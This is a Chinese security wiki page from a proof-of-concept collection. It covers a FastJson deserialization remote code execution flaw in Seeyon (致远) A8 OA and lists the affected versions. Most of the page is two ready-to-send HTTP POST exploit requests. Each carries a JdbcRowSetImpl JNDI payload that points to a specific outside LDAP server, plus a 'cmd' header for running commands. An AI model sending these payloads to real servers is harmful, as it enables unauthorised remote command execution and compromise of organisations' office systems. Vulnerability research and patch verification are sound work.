menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right POChouse-main chevron_right [+] 协同办公OA系统 chevron_right Seeyon-致远OA chevron_right A8-FastJson反序列化RCE
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    漏洞概述

    部分版本使用了有漏洞的fastjson组件,导致远程代码执行漏洞

    影响范围

    致远 OA V7.1、V7.1SP1
致远 OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3
致远 OA V6.1、V6.1SP1、V6.1SP2
致远 V6.0及V6.0SP1
致远 V5.6及V5.6SP1

    POC&EXP

    POST /seeyon/sursenServlet  HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
cmd:whoami

sursenData={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://119.45.153.41:1389/TomcatBypass/TomcatEcho","autoCommit":"true"}}

    POST /seeyon/main.do?method=changeLocale  HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
cmd:whoami

_json_params={"v24":
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://119.45.153.41:1389/TomcatBypass/TomcatEcho","autoCommit":true}}